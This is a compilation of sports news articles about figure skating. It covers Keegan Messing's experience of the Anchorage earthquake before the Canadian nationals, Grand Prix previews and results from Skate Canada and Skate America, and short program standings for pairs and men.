Boulders littered the two lanes. A long line of cars, some pockmarked from falling debris, was at a standstill.
Underneath the photo, the figure skater wrote: "Guess no practice today … p.s. family and everyone is ok."
The 26-year-old, who's aiming for his first Canadian figure skating title this week, grew up in Alaska, and a few weeks ago held on for dear life through his biggest earthquake yet — a 7.0 tremblor that rocked Anchorage.
"When it started shaking, I thought 'Oh OK, it's an earthquake,"' Messing said. "It started shaking more violently, and I was like 'OK, this is getting a little bigger.' Then it felt like a freight train came through and hit us. It felt like the house jumped off the ground. I grabbed (my fiancee) and pulled her under the doorway.
"It was early enough in the morning that it was still pitch black out, so you could just hold on in the dark and listen to everything just start to destroy itself."
Messing has climbed to the top of Canada's men's figure skating rankings with the retirement of three-time world champion Patrick Chan after last winter's Pyeongchang Olympics. He captured silver at Skate Canada International in the fall, then finished fifth in his Grand Prix Final debut in December.
WATCH | Keegan Messing using Olympic experience as motivation:
Messing grew up in Alaska, but his mother was born in Edmonton, giving him dual citizenship. He skated for the U.S. as a junior before switching his affiliation to Canada in the 2014-15 season.
He became the first Alaskan Olympian in figure skating when he clinched a spot on Canada's Pyeongchang team.
Messing has lived through earthquakes since he was a kid; they're a fact of life in Alaska. The big one on Nov. 30 crumbled buildings, and virtually melted roads, but there were no deaths. The aftershocks continued for weeks, including 80 nerve-rattling aftershocks that first day alone.
"It does make you look on the brighter side of life," he said.
Messing finds himself in an unfamiliar position at this week's nationals, which will determine the team for the world championships in Japan.
"I don't want to say it's a sad day to see Patrick go, but it is sad to see him go," Messing said. "We're definitely missing something special that he brought to the ice, and it's definitely weird not having him there to look up to, to have someone to chase.
"And the fact I kind of inherited his position coming in here, I have the target on my back now, so it's the first time I've been the person being chased."
Messing, who was a respectable 12th in his Olympic debut in Pyeongchang, will be chased for the title by Nam Nguyen, Roman Sadovsky and Nicolas Nadeau. Stephen Gogolev, who's just 14 but won gold in last month's Junior Grand Prix Final, is also competing in the senior competition here.
"I am trying to approach it the same way, but there is the added pressure," Messing said. "There is a part of you that has to love it, or you're not going to make it anywhere. We all get nervous, but when we get out there, it's the best thing in the world."

While he grew up in the U.S., Messing has strong ties to Canada. His great, great grandfather on his mother's side, Manzo Nagano, was the first Japanese immigrant to Canada, according to the Canadian Encyclopedia, among other historical sources. It's believed he arrived in Victoria in 1877 aboard a British steamer.
There's a mountain peak — Mount Manzo Nagano — named for Messing's famous ancestor in a remote coastal area of northern B.C.
So, winning a Canadian title would "mean the world to me," Messing said.
"I would never have thought I'd be where I am in my skating career without Canada. Even for personal standards of my skating ability, I don't think I could have ever achieved this without Canada," he said. "So to come here and even have a shot at the title, it's heartwarming. And to know (fans are) behind me, it's beautiful. I'm where I want to be, I don't have the words for it … It's great."
Chan's retirement is part of a seismic post-Olympic shift in Canadian skating. Also gone are two-time Olympic champion ice dancers Tessa Virtue and Scott Moir and two-time world pairs champions Meagan Duhamel and Eric Radford. Reigning world champion Kaetlyn Osmond is taking the season off competition to ponder her future. With an eye toward a future broadcasting career, Osmond is working with the media this week in Saint John.

After kicking off last weekend with Skate America, the Grand Prix of Figure Skating makes its annual Canadian stop this week.
Here's who to watch in each competition at Skate Canada in Laval, Que.
The men's field is an interesting one boasting lots of talent, including world and Olympic silver medallist Shoma Uno of Japan. In theory, this is Uno's competition to lose.
That doesn't mean it'll be a walk in the park for the 20-year-old. Several talented skaters will be looking to take the top spot. The first name that jumps out is South Korea's 17-year-old Junhwan Cha — another talented skater in the Brian Orser stable who was strong enough to win the free program at the recent Autumn Classic event, ahead of two-time Olympic champion and training mate Yuzuru Hanyu. Impressive.
Other men looking to make their presence felt include a trio of Canadians, led by national silver medallist Keegan Messing. He's known for consistency and an ability to lay down powerful jumps in a charismatic style, reminiscent of three-time world champion Elvis Stojko.
Way back in 2011, a tiny 14-year-old named Elizaveta Tuktamysheva walked into the media room after winning her first and only Skate Canada women's title. It seemed at the time like the dawn of a new age of Russian skating supernovas, and Tuktamysheva would go on to win the first world title in 10 years by a Russian woman in 2015. But injury, a growth spurt and inconsistent results prevented her from fulfilling the promise she showed early on.
There is something to be said for patience, though, and I see Tuktamysheva as a real title threat this week, even though she'll be going up against Olympic silver medallist and fellow Russian Evgenia Medvedeva. Medvedeva's pre-season competition at the Autumn Classic, her first since moving to Toronto to train with Orser, was sub-par, resulting in a silver medal behind American champion Bradie Tennell.
Skate Canada will be the test to see if Medvedeva has regained the unstoppable style that earned her two world and two Grand Prix Final titles.
Vanessa James and Morgan Cipres, the world pairs bronze medallists from France, are headed to Canada for a second time already this season. On their first trip, in September, they took the Autumn Classic title ahead of Canadians Kirsten Moore-Towers and Michael Marinaro. The rematch is on and I fully expect both teams to be in top form.
Moore-Towers had struggled with a foot injury that prevented her from doing certain pairs elements from the end of worlds in March until August. But, watching Moore-Towers and Marinaro skate at the Autumn Classic, you wouldn't have known she'd been hurt.
The month between that event and this one will no doubt have helped to boost their confidence. Look for the Canadians to not accept any step lower then the top of the podium without a fight.
The name of the game in ice dance is improvement. American champions and world silver medallists Madison Hubbell and Zachary Donohue are living proof of that after rising to a silver medal at this year's world championships. Polished and prepared with beautiful material, Hubbell and Donohue walked away with the Skate America title last weekend.
On paper, Hubbell and Donohue have the lead in terms of scores this season, but that doesn't mean I'm not expecting big things from Canada's four-time national silver medallists, Piper Gilles and Paul Poirier. With beautiful and innovative material of their own, Gilles and Poirier are looking to add to their Skate Canada silver and bronze medals in their fourth trip to this Grand Prix event.
Pj's gold-medal picks:
Men: Shoma Uno (Japan)
Women: Elizaveta Tuktamysheva (Russia)
Pairs: Vanessa James and Morgan Cipres (France)
Ice Dance: Madison Hubbell and Zachary Donohue (United States)

Madison Hubbell and Zachary Donohue had always thought about incorporating some elements of "Romeo and Juliet" into their ice dance routine.
At the suggestion of their coach, they decided to build their whole routine around it for the new season.
Turned out to be a winning decision.
World silver medallists Hubbell and Donohue of the United States broke the 200-point total for the first time in their long career together and captured the gold medal at Skate America on Sunday.
Watch the American duo's free dance
Hubbell and Donohue finished with 200.82 points: 78.43 for Saturday's rhythm dance and another 122.39 for Sunday's free dance. The previous best for the two Americans — who have been skating together since 2011, are defending U.S. champions and competed at the 2018 Winter Olympics in Pyeongchang, South Korea — was 197.42 at last month's U.S. International Classic in Salt Lake City, which they won for the fourth year in a row.
"I think there have been a million beautiful 'Romeo and Juliet' interpretations," Hubbell said. "But I think there's something special Zach and I can bring to this with the raw emotion and absolute intensity that goes into dying for the person you love. So we'll see where it goes"
Coming into the 2018-19 schedule, Hubbell and Donohue were open to ideas – any ideas – on what to select in building their new ice dance routine.
"We were actually struggling to find music after a season when we put so much energy mentally and physically into the Olympic season," Donohue said. "We had nothing, no idea, no guidelines what we wanted to skate with. It was Maddie who has always loved this song. We've tried to fit things before that had something to do with 'Romeo and Juliet.'
"Then it was our coach [Romain Haguenauer] who said, 'Why don't you just do 'Romeo and Juliet?'"
They did, and the American champions won the gold going away.
Later Sunday, Japan's Satoko Miyahara and Kaori Sakamoto went 1-2 in the women's competition for the second straight year.
Miyahara, last season's bronze medallist at Worlds and fourth at the Olympics, totalled 219.71 points. That included the top short program mark on Saturday (73.86) and Sunday's high mark in the free skate (145.85). Sakamoto finished with 213.90 points.

Newcomer Sofia Samudurova of Russia earned bronze with 198.70. U.S. champion Bradie Tennell, fifth after the short program, moved up to fourth with a solid free skate, and totalled 192.89. Canada's Alaine Chartrand placed ninth.

Miyahara was nearly flawless in her routine, perfomed to "Invierno Porteno," and executed several combination jumps: a triple lutz-triple toe loop, a double axel-triple toe loop, and, right near the end, a triple flip-double toe loop-double loop.
"I was really nervous until the very, very end because I have jumps until the end," Miyahara said. "But when I landed the flip, I was very happy.
"I skated clean. But I would like to be more confident for the next competition."

At the start of any post-Olympic Grand Prix season, the question always is about the new names of skaters who could leapfrog to the head of the pack.
"The post-Olympic season is always full of change," says four-time world champion and three-time Olympian Kurt Browning. "New, young talented skaters and new rule changes as well. They ask, 'How do I fit in?' A game plan is needed that not only gets you through this year but, hopefully, sets you up for the quadrennial. And, as always, skate well."
In the case of Skate America, I already know who the front-runners should be. What I don't know, based on early season outings, is what that will mean in the long run.
With Kurt Browning's "skate well" ringing in my ears, here's my take on the men's field:
Nathan Chen, the two-time American and current world champion, is head and shoulders above the rest of the rest of the pack headed to Everett, Wash.
I would have thought that this competition would be a walk in the park for Chen, but his first outing at the Japan Open where he faltered and wound up fourth of six skaters, leaves me wondering.
Could this be the moment for Canadian Nam Nguyen to take his place on the podium for the first time since 2014, when he won bronze at Skate America, his first ISU Grand Prix event.
CBC's Jacqueline Doorey explains changes to scoring:
It should be noted that Nguyen won his first pre-season event at the US International Figure Skating Classic in Salt Lake City over three skaters he will see at Skate America. That win could give Nguyen the push for a winning streak.
On the women's side, American champion Bradie Tennell's skating and style has been enriched and enhanced over the course of the off-season to present a much more mature package.
I was impressed with her win over Olympic silver medallist Evgenia Medvedeva at the Autumn Classic. From the jumps, to the spins, to the choreography, I see this event as Tennell's to lose.
Her biggest threats at Skate America will be coming from Japanese skaters Satoko Miyahara, the current world bronze medallist, and teammate Kaori Sakamoto, who took silver ahead of Tennell's fourth-place finish at the recent Japan Open.
In pairs, the Russian team of Evgenia Tarasova and Vladimir Morozov are on the brink of becoming legendary. They have such huge potential that has yet to be fully realized but I am predicting that this will be their year.
They opened their season with a gold medal-winning performance at Finlandia Trophy, where their beautiful classical style has been updated into something fresh and modern which they perform with ease.
American ice dance champions Madison Hubbell and Zachary Donohue last season began to earn the international respect that has been due them, grabbing a fourth-place finish at the PyeongChang Olympics and a subsequent silver medal at the world championships.
Their progress since moving to coaches Marie-France Dubreuil and husband Patrice Lauzon in Montreal in 2015 has been marked with dogged determination, tenacity and a work ethic that is second to none. Expect their star to continue to rise at Skate America.

Canada’s Meagan Duhamel and Eric Radford lead after the pairs short program at Skate America on Friday night, putting them in strong position to win a second Grand Prix event.
Duhamel and Radford scored 75.37, beating China’s Yu Xiaoyu Yu and Zhang Hao at 73.67. Germany’s Aliona Savchenko and Bruno Massot were third at 72.55 despite Massot’s fall on a triple salchow.
While Canada’s Kirsten Moore-Towers and Michael Marinaro finished seventh with 59.97.
Duhamel said the 2014 Grand Prix Final winners felt “tight,” and they struggled with their twist. The two-time world champions won at Skate Canada this year but were disappointed to lose levels on three elements Friday.
The Canadians didn’t think they’d stepped back.
“Overall, this was a lot better than Skate Canada,” Duhamel said, “and it’s going to be better at the Grand Prix Final, and it will be better at the Olympics.”
Massot was competing for the first time since passing his German citizenship test. The French-born skater got the news Thursday, clearing the way for him to compete at Pyeongchang. He was held out of the Sochi Games because his partner failed to gain French citizenship in time.
“It’s really different,” said Massot, “because I don’t have this now anymore in my head, this question like, ‘I will be blocked again, or not?”‘
Massot fell on his jump and the pair struggled with a spin Friday, too.
“The pressure was here,” Massot said. “I was really concentrating, but I would say that just today my legs … difficult to be flexible on the ice.”
American skaters Nathan Chen and Adam Rippon gave the home crowd what it wanted Friday night: Chen with a pair of powerful quad jumps, and Rippon with what he calls a “trashy dance-club program.”
“I think we made a good team. I think we’d make an even better Olympic team,” Rippon said with a big smile.
The fans and judges at Skate America agree. Chen and Rippon hold the top spots following the men’s short program at the last Grand Prix event before the Final.
Chen leads with 104.12 points, and Rippon is next at 89.04. Both Olympic hopefuls are still trying to qualify for the Grand Prix Final in Japan next month.
Chen landed two quad jumps, including one in combination with a triple toe loop. Chen will attempt five quads in the free skate Saturday night. An 18-year-old breakout star with gold medal aspirations at the Pyeongchang Olympics, he became the first skater ever to do five quads in one program at nationals in January.
His biggest challenge Friday: a nick in the blade of his skate
“It’s something that we’re addressing right now and it should be fixed for tomorrow,” Chen said.
Rippon gasped when his score was revealed after one of the best performances of his career. He skated to “Let Me Think About It” with flair, and the audience reacted. Fans clapped along as the 28-year-old skated, and he egged them on by pumping his arms after finishing.
“I like to show off,” he said.
The home favourite did not perform his signature Rippon lutz — a triple jump he performs with both arms over his head. He said he hasn’t tried it since separating his right shoulder in practice trying to mimic Chen’s choreography over the summer.
Jin Boyang of China entered with the most Grand Prix points in fifth place, but he scaled back his program and finished with a 77.97. Jin said through a translator he has a sprained ankle.
Russia’s Sergei Voronov is in third place at 87.51. Ross Minor of the U.S. is eighth with 71.59.
